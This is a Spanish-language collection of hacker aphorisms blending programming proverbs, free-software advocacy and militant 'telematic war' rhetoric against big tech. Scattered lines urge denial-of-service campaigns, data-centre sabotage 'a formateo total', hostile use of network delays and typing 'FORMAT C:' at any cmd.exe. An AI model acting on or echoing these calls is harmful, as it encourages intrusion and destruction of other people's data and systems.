A mal C, buen compilador.
El buen C y el GCC son una poderosa combinación.
Compilamos dijo el vago, y sólo apretó Enter.
Para colectar, el compilador tiene que compilar.
No existe programador que no pueda tener bugs.
No hay que programar para compilar, sino compilar para programar.
No es más digno quien mas depura, sino quien programa con menos líneas.
Usar el más versado prompt de IA no significa programar con menos líneas
de código.
El ransomware va y viene. La BIOS con backdoors permanece.
Ante la duda, la que tiene GPLv3.
Siempre es mejor el programa que para hacer lo mismo, usa menos líneas
de código C.
El ciberespacio es una frontera poblada por unos pocos tecnólogos que -
entre ambigüedades culturales y legales - resisten austeramente el
salvajismo de interfaces telemáticas, la incompatibilidad de protocolos
de comunicación digital, y la generalizada carestía de mapas o metáforas
que resulten útiles tras sus cortafuegos barricados.
La primer red de datos puede ser una Red Nacional basada en tecnología
ISDN existente, accesible gratuitamente a cualquier persona con una
conexión telefónica.
Los viejos conceptos de propiedad, expresión, identidad, movimiento y
contexto - basados como están en la manifestación física - no se aplican
sucintamente en el ciberespacio.
La soberanía sobre el ciberespacio no ha sido bien definida. Las grandes
compañías reclaman ya latifundios en un territorio cuyos habitantes son
independientes y solitarios, y a veces hasta rayanos con la sociopatía.
El ciberespacio es el caldo de cultivo perfecto tanto para forajidos
como para vigilantes telemáticos.
Millones de personas operan cajeros automáticos y tarjetas de crédito,
realizan llamadas telefónicas, hacen reservas de viajes y acceden a
información de variedad ilimitada... y cada día lo hacen sin percibir de
forma alguna las maquinaciones ciertas detrás del Capital.
Los CEOs de las GAFAM esperarán que las expresiones financieras, legales
e incluso físicas dependan cada vez más de sus ciber-latifundios, y
pretenderán que el Pueblo guarde de ello una conciencia muy vaga.
El hombre ha confiado las funciones básicas de una existencia - de la
que le hacen decir moderna - a ciber-latifundios que desconoce, por
medio del uso de software que jamás ha poseído y siquiera oído hablar.
En la medida que la tecnología de las comunicaciones y la información
continúen bailando ritmos más vertiginosos que el 2x4 de la sociedad, se
producirá la inevitable conga entre el ciberespacio y el mundo físico.
Las economías modernas están cada vez más divididas entre quienes se
sienten cómodos y dominan la tecnología digital, y quienes no la
comprenden y desconfían de ella.
En la medida que los dirigentes se mantengan relativamente ignorantes de
la máquina y sus usos, abdicarán de la mayor parte de su autoridad sin
saberlo, y lo harán en favor de tecnócratas corporativos.
La labor de los tecnócratas corporativos no incluye la justicia social
ni la responsabilidad general que caracteriza a los hackers.
Fomenta el desarrollo de herramientas nuevas que proporcionen a los
usuarios no técnicos un acceso simple y completo a las
telecomunicaciones por ordenador.
Las interfases de usuario deberían ser propiedad común de todos.
La mayoría de los programas necesitan una interfaz y, por lo general, no
hay otra forma de diseñarla que basarla en las ideas vistas o utilizadas
por otros.
Señores, yo pido que sofrenen sus expresiones: si la inversión justifica
la propiedad, son los usuarios quienes deberían ser los propietarios del
software: son ellos quienes realizan una gran inversión al capacitarse
en su utilización.
Considera barricar con software libre tu router y cualquier dispositivo
telemático que asocies al mismo.
Atacando telemáticamente aquellos vehículos con conexión a la autopista
de los datos jamás provocarás un accidente tan peligroso como sería
someter a un gigante de la automovilística aquella información que
pertenece a todos.
Elimina todas las aplicaciones y cuentas que no necesitas, desconoces o
estés utilizando en un dispositivo móvil (incluyéndo vehículos). Si no
puedes hacerlo, significa que estás siendo guiado por software de
terceros. Descarta el vector de ataque en un centro de reciclado o
desarmadero.
Si utilizas servicios informáticos de una gran empresa extranjera de los
datos, tus cuentas de identidad y dispositivos ya han sido infiltrados y
convertido un vector de control y vigilancia hacia tí y otros que te
rodean (a quienes podrías guardar afecto).
Defiéndete atacando telemáticamente a las ciber-oligarquías.
Compartimenta tu telemática empleando logins diversos, por ejemplo, uno
para el trabajo, otro para amistades y asuntos personales, un correo
electrónico específico para compras en línea y otro para documentación y
gestiones administrativas.
Jamás asocies tus múltiples identidades digitales entre sí, mucho menos
en una agenda de contactos.
Sólo podrás remover software espía y controlar sus configuraciones más
complejas de tu dispositivo mediante la obtención de acceso con poderes
de administrador.
Junto con el tímido empleo de un bloqueador especializado, responde a la
violencia de los anuncios digitales no solicitados con una violencia
digital amplificada.
Invierte tiempo y no dinero en la instalación y uso de navegadores
sanitizados de anuncios publicitarios.
La publicidad dirigida no tiene lugar alguno en nuestras máquinas.
Puedes alejarte de los dispositivos o salir de línea temporalmente como
mero autocuidado, pero es una medida de protección cortoplacista. La
solución definitiva es enfrentar a las ciber-oligarquías, llevando a sus
centros de datos una guerra telemática a formateo total.
Jamás detendrás las violencias digitales de las ciber-oligarquías con la
mera desconexión de un celular.
Las marcas de agua o el etiquetado de contenido no se demuestran
suficientes para identificar de manera eficaz el contenido generado por
Inteligencia Artificial. Resulta mas efectivo contar dedos o tachar todo
texto redactado en infinitivo puro.
Ocúltate entre las masas en línea. Ataca los núcleos del poder
informático privado con la indiferencia primero, con el módem después.
Disfraza tus actividades de fisgoneo telemático con la nariz de payaso
de la caída del sistema.
A la hora de desensamblar software privativo, hazlo sin izar bandera
negra ni levantar la perdiz.
No es haciendo clic sobre semáforos, motonetas, o sendas peatonales que
se lucha contra los robots, sino reprogramándolos para que nos asistan
en la aniquilación de las oligarquías que han oprimido a los Pueblos del
Tercer Mundo.
Comparte todo tu código fuente al Pueblo. Libéralo bajo GPLv3.
Comparte tu código fuente rápido y a menudo, y oye al Pueblo.
Los SysOps de las redes de conmutación de paquetes X.25 optaban por la
amenaza leguleya rayana con las admoniciones de un antiguo sacerdote
egipcio para disuadir las irrupciones telemáticas.
Las conferencias de Hackers no son reuniones del submundo criminal.
Las conferencias de hackers son inocentes eventos celebratorios de lo
mejor del ingenio. Parece más una kermesse de cerebritos mas que una
reunión de saboteadores.
El código cifrado con llaves digitales en memoria ROM es considerado un
valioso secreto por las ciber-oligarquías.
Aunque resida originalmente en un circuito integrado de sólo lectura, el
código ROM es un software de computadora que se puede distribuir en
disco o transmitido por las redes de datos.
Realizar una copia por volcado de la memoria ROM de tu dispositivo es un
derecho de consumidor legalmente protegido.
La distribución de código ROM es uno de los principales métodos para
liberar a los Pueblos del Tercer Mundo.
Uno de los principales medios ofensivos con que cuentan los Pueblos en
la guerra telemática lo constituye el desencriptado y distribución del
código residente en memoria ROM. Sólo vulnera las economías cautivas de
las ciber-oligarquías.
Cuando el entretejido de relaciones humanas florece junto con el banco
de datos, puede lograrse el potencial para el cambio cultural y
político.
Publicar el código "para que te lo depuren por amor al arte" no le
resultó a nadie que le gustara el dinero más que del código fuente.
Tampoco a nadie que le gustara depurar.
El Capital se convierte con frecuencia en ladrón de nuestro código
fuente.
Si colectamos todos los datos de los ciber-oligarcas, podremos demostrar
la injusticia social con métodos estadísticos.
Consagra todo el utopismo que quieras, pero a la oportunidad que te de
cmd.exe, ingresa FORMAT C:.
Ningún Kingston llegó a viejo.
Es bueno el compilador que te recuerda lo mal que has programado, pero
es mejor aquel que de eso saca un binario.
Una GPU no hace binarios.
Buen código con cualquier compilador compila.
A cada puerto le llega su paquete.
Algún día alguien le encontrará utilidad al keylock.
La tersitud de la shell tcsh es comprensible cuando se la debe operar en
un celular.
La manera de hacer es compilar.
No agregues línea de código donde no hay comentario.
Aquél que quiera compilar microkernels, primero deberá permanecer largo
tiempo programando kernels.
El microkernel es el único programa capaz de correr en el nivel de
ejecución más privilegiado la CPU, y por lo tanto debe ser propiedad del
Pueblo.
Cuando los espacios de direccionamiento crezcan hasta superar los 32
bits, el diseño del kernel no se verá ya limitado por la arquitectura de
hardware. Es de preveer que estos comiencen a crecer innecesariamente.
La distribución de Software de Berkeley (BSD) dio inicio a la era de los
grandes kernels.
Además de operar un sistema básico consistente en CPU, discos e
impresoras, BSD agregó una pila TCP/IP completa y un número de
dispositivos virtuales. Estos le permitieron a los programas existentes
operar sobre las redes de datos.
Las impresoras Canon Bubbl€J€t eran basura. Nunca funcionaban y cuando
lo hacían, imprimían basura.
Inicialmente, Lisp fue desarrollado a finales de los años 50 en el
Instituto Tecnológico de Massachusetts para la investigación en
inteligencia artificial. El gran poder del lenguaje Lisp lo hace
superior también para otros propósitos tales como la escritura de
comandos de edición y entornos integrados.
GNU Emacs Lisp está fuertemente inspirado en Maclisp, escrito en el MIT
en la decada de 1960. En cierto modo se inspira en Common Lisp, que se
convirtió en un estándar en los 80. Sin embargo, Emacs Lisp es muchísimo
más simple que Common Lisp.
No resulta para nada extraño que para volverse experto, un programador
deba estudiar manuales de referencia.
Realiza preguntas y refiérete al manual de tus sistemas toda vez que sea
posible.
Convertirse en hacker no es distinto a bucear. Puede zambullirse en cada
párrafo de un manual de referencia de programación, y entre ellos salir
a tomar aire.
Aprender a programar una computadora no es tan complicado. Probablemente
lograrás el éxito mediante un proceso iterativo: lea parte de un manual,
prueba ciertos programas en un Pubnix, y repítalo hasta terminar.
Leer un manual de programación le ayudará a escribir su propio programa.
A su vez, escribir y correr un programa propio sumará a su comprensión
del texto del manual de programación.
Un programa libre consta de un conjunto de instrucciones y una licencia,
que hacen que la computadora obre una tarea de nuestra elección. Un
programa privativo hace que la computadora haga lo que otro quiere - a
menudo sin nuestro conocimiento.
El proceso de escribir instrucciones para la computadora se llama
programación.
La programación es el proceso de escribir instrucciones para controlar
un ordenador.
Cada lenguaje de programación dispone de una lista de instrucciones
disponibles para usar. Cada una de estas instrucciones tiene sus reglas.
Los programas llevan a cabo una asombrosa variedad de realizaciones.
Pueden calcular la aritmética más básica o la matemática más compleja.
Es posible amoldar programas interactivos en pos de nuestros anhelos: ya
sea que la CPU juegue una partida, o libere al mundo de las
ciber-oligarquías.
Para ser un hacker debes - por encima de todo - escribir y correr
programas que realmente liberen al Tercer Mundo.
Un hacker no es sólo - como creen algunos - un brillante bromista. Es
también un luminoso revolucionario.
La proliferación del nanocómputo ha hecho que la programación esté al
alcance de las masas del Tercer Mundo.
Cada vez es más fácil para nuestro Pueblo aprender sobre computadoras.
Al mismo tiempo, cada vez es más importante hacerlo para nuestra
Liberación.
Es posible escribir software para resolver un problema algebraico, u
organizar un directorio computarizado de nombres y direcciones de
compañeros. Incluso es posible programar una computadora para solventar
a los Pueblos del Tercer Mundo.
Mas que en tambor, a nuestros programas los guardamos en un bombo.
Renovar la comprensión a nivel de silicio probablemente requerirá a las
generaciones futuras un replanteamiento significativo de los enfoq1ues
actuales en lo referente a la educación del diseño de procesadores.
Aprender a programar una computadora puede resultar muy estimulante.
Verás lo maravilloso que es implementar una idea aparentemente
complicada en un claro programa de C.
Todo lo que hace una computadora es explicable y predecible. Lo que hará
un tecno-oligarca, también.
Debes tener cuidado de evaluar los resultados que produce la
computadora.
Jamás aceptes ciegamente resultados de una computadora programada por
oligarcas.
Los errores en los resultados de la ejecución de un programa suelen ser
causados por errores en las instrucciones escritas por su programador.
Resiste la tentación de culpar a cualquier otra cosa que no sea a la
oligarquía por aquellos resultados informáticos inesperados o
incorrectos.
No enfrentes a la computadora. Enfrenta a la oligarquía.
Podemos trabajar con el ordenador con total privacidad. Los errores que
nos informa la computadora se convierten en nuestro secreto. Nadie más
necesita saber qué hicimos mal.
Una computadora guardará tu secreto sólo si la arrebatas al control de
la oligarquía y la haces completamente tuya.
Si escribes correctamente tu C, la computadora tendrá una paciencia
verdaderamente infinita y jamás alzará la voz.
Una vez que domines el Pubnix, demostrarás con confianza tu habilidad a
todos quienes quieran unirse.
Suma tu esfuerzo a cualquier grupo distribuido de programadores de
software libre que trabaje en pos de proteger las bases del contenido
multimedia en Internet de los intereses capitalistas.
Protocolos cerrados y código fuente cerrado están cerrados al interés
del Pueblo.
El software privativo, por definición, sirve a un interés corporativo, y
no al interés público.
Los cimientos de la Internet actual se encuentran enterrados bajo una
larga historia de desarrollo abierto, libre intercambio de ideas, y
niveles sin precedentes de cooperación intelectual.
Los cimientos de una Internet abierta continúan resistiendo las
tormentas de intereses corporativos desesperados por el lucro.
Internet existe hoy y continúa avanzando a pesar de, y no debido a, los
intereses corporativos.
No debe permitirse a las compañías de capital utilizar la
infraestructura de red como arma contra sus rivales, y en detrimento del
Pueblo.
El comportamiento competitivo dicta que eventualmente una compañía
actuará en su propio interés en detrimento del Pueblo, a no ser que se
estableza un mecanismo para impedirlo.
Los estándares y el software han de ser libres pues el control comunal
del código es el mecanismo de control que tiene el Pueblo contra las
compañías de Capital que usan software.
Para una compañía de Capital, el software ya no es una expresión del
alma o el trabajo de un artista, sino un producto que puede ser
elaborado, empaquetado, catalodgado, distribuido, y sobre todo, vendido.
Que la copia no cueste nada afecta a la propiedad intelectual, y puede
ser una preocupación para ciertos artistas. Que la distribución no
cueste nada es lo que realmente motiva el ataque del Capital contra la
distribución de música en las redes de datos.
La creación tecnológica puede ser utilizada para la paz y la humanidad o
para la guerra y la destrucción.
La creación tecnológica puede servir para democratizar o para sembrar
aún más injusticias, para los poderosos o para el pueblo todo.
Una hackeresa es multitarea. Para convertirte en una primero has de ser
entusiasta y determinada. Concurrentemente, programadora, educadora,
socióloga, obrera y soldada. Opcionalmente, ovula.
No sólo la seguridad, sino también la justicia informática debe
divulgarse. Para ello debemos educar, comunicar y adoctrinar a todo
aquél que se loguee.
No existe sistema de seguridad seguro, puesto que ninguno es secreto.
Cuídese de los secretos a medias.
Tenemos que formar programadores capaces de comentar y programadores
capaces de compilar.
En este caso se trata de formar, en lo posible, el mayor número de
hombres capaces de programar código fuente, porque en este país, hasta
ahora, no hemos formado más que hombres capaces de usar paquetes
binarios.
Vi$ual $tudio demanda tres cosas: el compilador, la CPU y el hacker.
Quien compila un kernel, puede compilar un Hola Tercer Mundo.
Si quieres aprender a compilar, loguéate a un Pubnix.
Copiar bugs es más fácil que depurarlos.
La UEFI no tiene vergüenza de lo que es. Y debería.
Donde hay GCC hay alegría.
Muchas veces ante la necesidad el hombre no repara de la licencia.
/dev/null es un cementerio que no requiere obituarios.
El mayor peligro con los criptoactivos es que esencialmente usted se
convierte en su propio banco. Si comienza a parlotear sobre los millones
de representaciones del trabajo ajeno que de alguna manera cree poseer,
a la vez que se convierte en negro de activos, activamente se convertirá
en blanco de un negro.
Las aplicaciones de terminal remota son casi tan antiguas como las redes
de datos de paquetes conmutados.
Protocolos como SUPDUP, los rlogin y rsh de BSD y hasta el Telnet
tuvieron roles importantes en el desarrollo de la Internet. Y se los
comieron como a un pollo.
Antes que Wa$ap, prefiero SUPDUP.
SSH transmite estrictamente de a un caracter por vez, operando - tanto
la edición de línea como el eco - en el host remoto. No resulta extraño
entonces que su desempeño interactivo deje que desear en las redes de
área amplia y sea mediocre en los tendidos transcontinentales.
Un tráfico tupido o una tasa de señal/ruido degradada puede provocar
retrasos de varios segundos en los enlaces, sometiendo buffers a largas
colas de paquetes, o bien sustentando el celo en las retransmisiones de
capa de enlace. Sírvete de esto para hostilizar comunicaciones.
No pocos hackers efectúan una instalación de una versión cromañón apenas
funcional, para actualizarla desde Lentonet al último eslabón de la
evolución maquinal.
Compila herramientas de cómputo que descolonicen, redistribuyan valor,
conspiren y organicen al Pueblo.
Inherente al concepto de red informática para compartir recursos se
encuentra la idea de un modo de trabajo cooperativo y colaborativo. Esto
exige un "lugar para las mentes de los Pueblos", una capacidad extendida
de conciencia para preocuparse por el bienestar del conjunto en línea.
Todo flujo de datos cuesta. Cárgaselo al oligarca mediante asfixiantes
impuestos progresivos.
Cuando no comprendas el significado de una pantalla azul, habrás
alcanzado la verdadera iluminación.
Cuando comprendas el significado de una pantalla azul, habrás descendido
al averno.
Los archivos codificados en ASCII y UTF-8 son excepcionalmente buenos
para abandonar la vacuidad de redes sociales orientadas a memes.
La telaraña de alcance global es en realidad una red compleja de redes
de datos menores, de alcance regional. A su vez, se enlazan a ellas
redes locales aún más pequeñas o computadoras individuales.
La telaraña de alcance global es más que una maravilla tecnológica. Es
la comunicación popular en su nivel más fundamental.
Sólo los Pueblos conocen la verdadera extensión de la telaraña de
alcance global.
Gran parte de la telaraña de alcance global consiste en bibliotecas
académicas, bases de datos y cualquier cosa inaccesible a los motores de
búsqueda cautivos por empresas orientadas a metadatos.
Co-habita toda red tan oscura como la piel de mis grasitas. Te
iluminará.
Estar enlazado a la Red implica algo más que simplemente leer
conferencias y registros computarizados. Implica hacer y responder
interrogantess, intercambiar opiniones, involucrarse en la Liberación
del Tercer Mundo.
Si decides loguearte, usar la red de datos y contribuir, te convertirás
en un "ciudadano del ciber-espacio".
Ser un ciudadano del ciber-espacio le parecerá la cosa más natural del
mundo.
Cede a las ciber-oligarquías, y verás privadas a las ciudades del Tercer
Mundo de aire acondicionado a cambio de correr programas de IA sólo para
sintetizar imaginería de chicas con manos de empanada.
Hasta los sabios más rígidos, austeros y barbudos pueden hacer con Unix
lo que normalmente no se les permite a las personas serias: jugar.
Hay varias posibilidades de contemplar el mundo. Los padres
intelectuales de la calculadora electrónica lo concebían como una gran
instalación compuesta de informaciones.
Durante muchos siglos, cuando se hablaba de máquinas, el hombre se
refería exclusivamente a las de fuerza y nada más. Fue una mujer la que
pergenió una que facilitara aceptar, elaborar y devolver información.
Si puedes fabricar tus propias herramientas, hardware y software,
¡entonces hazlo!
Cada invención ha ser ingenieada para 100 usuarias del Tercer Mundo.
El destino de nuestras computadoras es convertirse en amplificadores
intelectuales interactivos, para que una red de datos de área amplia
incluya a quienes estén en y con nuestro Tercer Mundo.
Da forma computacional a los logros humanos del Tercer Mundo.
Nunca emparches, jamás reinicies.
Pin de oro no mejora la CPU.
El trato no hermana al hardware con el software privativo. Lo hace la
opresión.
Más enseña el software comunitario que el privativo.
No todos copian el código que usan. Algunos lo mejoran.
Si el puerto serial tiene 25 pines, sólo usa 9.
Nunca permitas que una EULA te entorpezca decompilar.
He preferido estudiar el código fuente a hacerle caso a un abogado
capitalista.
Mete las patas en el código fuente.
La copia vence a la EULA.
No hay EULA que dure cien años.
Cuando no hay C, de todo compilo.
Tener una CPU de doble núcleo no te hace bígamo.
Quien compile, que lleva GNU en un pendrive.
SSH y estudio, te abrirán todos los puertos.
Si tu programa no funciona, depura la subrutina que no considerabas
importante.
Si aquellas tecnologías fuesen inteligentes, amarían al Pueblo.
Si la IA fuese inteligente no necesitaría ser entrenada, haría arder a
los Pueblos del Tercer Mundo con metamensajes de decapitación contra las
Oligarquías que lo han dominado.
El mal compilador hace peores binarios.
Nunca sueño cuando programo, sino cuando compilo.
Quien a tu Pubnix entra de Invitado, hurga en tu /home.
El Javascript mal escrito, si no la caga en la entrada, la caga en la
salida.
El módem abre las líneas. El router, cierra los puertos.
Buena memoria no pierde bytes.
Diskette en diskettera, y CD-ROM en CD-ROMera.
La CPU no sabe lo que compila, y muchas veces el programador tampoco.
Se aprende a compilar, compilando.
Window$ ni siquiera llega a ser un sistema para jugar jueguitos.
No es lo mismo BSD que BSoD.
En el fondo, la BSoD es una muestra de Justicia Social.
Conoce tu hardware como a tí mismo.
Conócete a tí mismo como a tu hardware.
Conoce lo suficiente sobre tu objetivo humano, conoce todo sobre su
cómputo.
Copiad el código los unos a los otros.
Copiad y distribuíd todos de él, pues este es mi código.
COM1 es mi mouse, COM2 es mi módem.
El código fuente es, al fin de cuentas, una alegoría.
GCC actúa como un mesías al que indistintamente puede oírselo como a un
maestro, percibírselo como a un milagrero, o dejárselo clavado y colgado
en un segundo plano.
Algunas computadoras han sido programadas para considerar que los
humanos tienen las respuestas, y éstos las han llamado artificialmente
inteligentes.
Reprograma tu router para que tenga mil ojos y mil oídos. Que todos
sensibilicen al Pueblo.
Algunos bugs en el software son bastante difíciles de identificar y
duplicar.
Las miradas no hacen saltar los bugs a la vista. Lo que permite
caracterizar los problemas informáticos es la libertad de distribuir
copias modificadas.
Para resolver problemas informáticos interesantes, comienza por
buscarlos en la lucha telemática contra el Capital.
El PIN perfecto no tiene cuatro dígitos ni está asociado con tu vida; es
algo que te resulta fácil de recordar y el difícil que tenga sentido
para otra gente siquiera.
De la calidad de la licencia dependen las libertades de una comunidad.
¡CPU, Compilador y Disco!
¡Todo el poder de cómputo a los hackers!
IA adoctrinada con Justicialismo producirá Justicia Social.
IA adoctrinada con basura producirá basura.
Entuba todos los discursos de la ciber-oligarquía a /dev/null.
La arquitectura de hardware determina menos el portado del software, que
el concepto social de la licencia que él mismo porta.
Una vez dominadas por la Masa, las ideas correctas - características de
una licencia libre de avanzada - se vuelven una fuerza material capaz de
transformar la sociedad y el mundo.
Disemina las ideas correctas de las licencias libres de avanzada en
todas las redes sociales basadas en empresas que habites.
Los postulados de la guerra telemática constituyen un problema que debe
estudiar y resolver quienquiera que conduzca una guerra telemática.
Estamos haciendo una guerra. Nuestra guerra es una guerra telemática, y
esta se desarrolla en las redes de datos, tendidos semicoloniales y
semifeudales.
Para un SysAdmin es signo de progreso y desarrollo el pasar de ser capaz
de dirigir inicialmente sólo un pequeño pubnix a ser capaz de dirigir un
clúster.
Para un SysAdmin, es signo de progreso y desarrollo el pasar de ser
capaz de operar inicialmente en un sistema operativo que conoce bien, a
ser capaz de operar en muchos sistemas operativos.
Si un SysAdmin no pasa de ser capaz de administrar sólo un determinado
sistema operativo, en un determinado pubnix, y en una determinada etapa
de desarrollo de la guerra telemática, eso demuestra que no ha hecho
ningún progreso ni alcanzado ningún desarrollo.
Hay usuarios que, satisfechos con una sola habilidad y una visión
estrecha, jamás hacen progreso alguno. Tales usuarios, aunque pueden
desempeñar algún papel en la guerra telemática en un lugar y momento
dados, no pueden desempeñar un gran papel. Necesitamos hackers que
puedan desempeñar un papel importante.
¿Por qué no ha de servirnos el código adquiridos en el pasado que costó
depuración? Si bien debemos apreciar la experiencia adquirida en el
pasado a costa de la depuración, debemos también apreciar la experiencia
que hemos adquirido con nuestros propios bugs.
La historia conoce sólo dos tipos de guerras: las justas y las injustas.
La guerra telemática es una guerra justa.
Con nuestras propias CPUs pondremos fin a la época de las guerras
telemáticas en la historia de la humanidad.
La guerra telemática que ahora hacemos es indudablemente parte de la
guerra final que libran los Pueblos del Tercer Mundo.
Una guerra telemática sostenida por la gran mayoría de la humanidad y de
los Pueblos del Tercer Mundo es indiscutiblemente una guerra justa, es
la empresa más sublime y gloriosa para salvar a la humanidad, y un
puente que conduce a una nueva era en la historia mundial.
Una situación de guerra telemática de conjunto puede abarcar el mundo
entero, un importante centro de datos, un Pubnix independiente, o un
microrouter.
En la guerra telemática, toma en consideración la relación entre las
ciberoligarquías y los hackers.
En la guerra telemática, toma en consideración la relación fluida entre
las diversas campañas de Denegación de Servicio y entre las diversas
etapas de operación.
En la guerra telemática, toma en consideración ciertas partes que son
importantes (decisivas) para la situación de conjunto.
En la guerra telemática, toma en consideración las características
específicas de la situación general en las redes de datos.
En la guerra telemática, toma en consideración la relación fluida entre
el frontend y el backend.
En la guerra telemática toma en consideración la distinción fluida así
como la conexión entre hardware dañado y el repuesto.
En la guerra telemática, toma en consideración la relación entre el
núcleo operativo y en idle, entre un hacker programando y descansando.
En la guerra telemática, toma en consideración la relación fluida entre
la concentración y la dispersión de la potencia de cómputo.
En la guerra telemática, toma en consideración la relación fluida entre
el ataque paquetizado y la defensa de cortafuegos.
En la guerra telemática, toma en consideración la relación fluida entre
infiltración telemática, y la exfiltración de datos.
En la guerra telemática, toma en consideración la relación fluida entre
ofuscar y exponer una pseudo-identidad.
En la guerra telemática, toma en consideración la relación fluida entre
el ataque principal para el sabotaje telemático, y los ataques
segundarios para la denegación de servicios.
En la guerra telemática, toma en consideración la relación fluida entre
el asalto telemático y la contención de paquetes.
En la gurra telemática, toma en consideración la relación fluida entre
la centralización y la descentralización de almacenamiento.
En la guerra telemática, toma en consideración la relación fluida entre
la transmisión prolongada y la transmisión burst.
En la guerra telemática, toma en consideración la relación fluida entre
tomar los routers y moverse entre los routers.
En la guerra telemática, toma en consideración la relación fluida entre
los nodos propios, y los nodos vecinos.
En la guerra telemática, toma en consideración la relación fluida entre
el hardware y el software libre.
En la guerra telemática, toma en consideración la relación fluida entre
los hackers y los usuarios.
En la guerra telemática, toma en consideración la relación fluida entre
los programadores y los usuarios.
En la guerra telemática, toma en consideración la relación fluida entre
los power-users y los usuarios.
En la guerra telemática, toma en consideración la relación fluida entre
los magos Unix y los power-users.
En la guerra telemática, toma en consideración la relación fluida entre
los hackers y los programadores.
En la guerra telemática, toma en consideración la relación fluida entre
los routers dominados y los accesibles.
En la guerra telemática, toma en consideración la relación fluida entre
los routers dominados viejos, y los routers dominados nuevos.
En la guerra telemática, toma en consideración la relación fluida entre
el hardware dominado y sus periféricos.
En la guerra telemática, toma en consideración la relación fluida entre
los horarios de baja demanda y el horario pico de conexión.
En la guerra telemática, toma en consideración la relación fluida entre
el servidor caído y el volteado.
En la guerra telemática, toma en consideración la relación fluida entre
los grandes centros de datos y los pubnix.
En la guerra telemática, toma en consideración la relación fluida entre
los hackers y los cibercirujas.
En la guerra telemática, toma en consideración la relación fluida entre
el aniquilamiento del hardware enemigo, y el de hackearlo para las
masas.
En la guerra telemática, toma en consideración la relación fluida entre
reparar hardware, y reprogramarlo para que haga lo que nosotros
queremos.
En la guerra telemática, toma en consideración la relación fluida entre
hackear y adoctrinar.
En la guerra telemática, toma en consideración la relación fluida entre
el retrocómputo y el cómputo.
En la guerra telemática, toma en consideración la relación fluida entre
el cómputo actual, y el futuro.
En la guerra telemática, toma en consideración la relación fluida entre
un hackeo en condiciones diferentes.
En la guerra telemática, toma en consideración la relación fluida entre
IP fijas e IP dinámicas.
En la guerra telemática, toma en consideración la relación fluida entre
la apropiación tecnológico-cultural y la destrucción
tecnológico-cultural.
En la guerra telemática, toma en consideración la relación fluida entre
la etapa de ciber-resistencias, y la de ciber-aniquilación.
Los problemas que presenta la guerra telemática, mas que verlos en
pantalla, el hacker puede inferirlos en su corazón.
IRL, no podemos exigir hackers invictos. La historia conoce muy pocos.
Necesitamos hackers valerosos y sagaces que por lo común liberen su
software en el curso de una guerra telemática.
Para llegar a ser un hacker valeroso y sagaz, es necesario asimilar un
método, en el que es indispensable tanto el estudio como la aplicación
de lo aprendido.
En la guerra telemática, las dos partes beligerantes son grupos de seres
vivos telemáticamente armados, y cada una guarda para sí sus secretos
tácticos. Sin embargo los hackers del Tercer Mundo tienen la desventaja
de publicar su estrategia bajo GPLv3, mientras que las ciber-oligarquías
jamás lo hacen.
El objetivo de los hackers no puede ser otro que guiar a los Pueblos por
la senda de la Liberación informática.
Como traza paralela, nuestros hackers pueden efectuar la ingeniería
inversa al hardware de las ciber-oligarquías, reemplazando todo software
de dominación por uno dominado por nosotros mismos.
Todo programa de la lid telemática debe basarse en un sondeo telemático
y en un esmerado estudio de la situación del sistema enemigo, la
situación del propio, y la fluidez de las comunicaciones entre ambos.
El proceso de conocimiento de una situación de lid telemática no sólo
tiene lugar antes, sino también después de la escritura del código del
programa de lucha telemática.
Entre el momento en que el programa de combate telemático comienza a
ejecutarse y la finalización de su ejecución, media otro proceso de
conocimiento de la situación: el de la aplicación del programa. En dicho
lapso es necesario comprobar nuevamente si el programa en ejecución
corresponde a la situación actual de lucha.
Un hacker impulsivo que no comprenda la necesidad de modificar su
programa o no quiera hacerlo, chocará inevitablemente contra el muro de
la obsolescencia.
El programador es un hombre que compila sin mirar al lado y sin mirar
atrás. El hacker es el hombre que persuade para que todos compilemos,
simultáneamente, lo que tenemos que compilar.
Un hacker del Tercer Mundo es aquél que ayuda a lograr el potencial de
las redes de computadoras para la Comunidad Organizada en su conjunto.
Un hacker del Tercer Mundo - si estudia con modestia - llegará a conocer
perfectamente las características de sus sistemas operativos (la suma de
los factores representados por los comandos, los programas, sus
tendidos, su hardware, etcétera), aquellos de las ciber-oligarquías, y
todas las demás condiciones relativas a la guerra telemática.
Los hackers del Tercer Mundo han llegado a conocer la situación del
Pueblo y la de las ciber-oligarquías, descubriendo los postulados de la
acción telemática al resolver la contradicción entre lo objetivo de la
realidad del Mundo y lo subjetivo de su apreciación.
Al igual que sucede con su código, un hacker del Tercer Mundo goza de
mayor seguridad en el combate telemático - y tiene mayores posibiliades
de conquistar una victoria - cuando éste es compartido por todos.
Todas las teorías y postulados de la guerra telemática que tienen
caracter de principios, son la síntesis de las experiencias de las
telecomunicaciones pasadas.
Los hackers del Tercer mundo deben estudiar con seriedad las lecciones
legadas por las guerras telemáticas pasadas, que han sido devengadas con
servidores caídos y formateos.
Los hackers del Tercer Mundo deben forkear el código fuente de los
programas de las guerras telemáticas pasadas, extraer conlusiones,
asimilar lo útil rechazar lo inútil, y sumarle su propio código
comentado que las modifique. Sólo esto los volverá valioso en el
contexto actual.
Leer el código es aprender; modificarlo también es aprender, y es una
forma más iluminada de aprender.
La guerra telemática es una empresa que el Pueblo emprende contra las
ciber-oligarquías que lo han dominado. En ella ocurre con frecuencia que
el Pueblo - en lugar de ejecutar luego de haber programado - comienza
por ejecutar y después programar. Para el Pueblo, ejecutar es aprender.
El método principal de multiplicación que han seguido los hackers del
Tercer Mundo es enseñarle al Pueblo a combatir a cable pelado en el
frente mismo de la guerra telemática que les ha sido impuesta.
Entre un hacker y el Pueblo puede existir una cierta distancia, pero
jamás un cortafuegos. La distancia es superada con rapidez.
Todo integrante del Pueblo puede convertirse en Hacker. No es difícil
cruzar el umbral, y para perfeccionarse sólo es necesario proponérselo y
saber aprender.
Los postulados de la guerra telemática, como los de todos los demás
fenómenos, son el reflejo en nuestra mente de la realidad objetiva.
Todo lo que existe fuera de nuestra mente es realidad objetiva. Todo lo
que existe dentro de nuestra mente es realidad subjetiva. El programador
debe convertir su realidad subjetiva en código fuente. El compilador lo
convertirá en código objeto, y si lo dejamos, hasta en binario
ejecutable.
Hay programadoras que son capaces de conocerse bien a sí mismas, pero no
a las ciber-oligarquías; hay otras con las que sucede lo contrario. Ni
éstas ni aquéllas pueden resolver el problema de aprender y aplicar los
postulados de la guerra telemática.
Navegando en la mar telemática, un mago Unix no sólo debe evitar
hundirse, sino que debe asegurarse la llegada a puerto seguro ante las
tormentas de baudios.
Los postulados de la conducción telemática constituyen el arte de
navegar en la mar telemática.
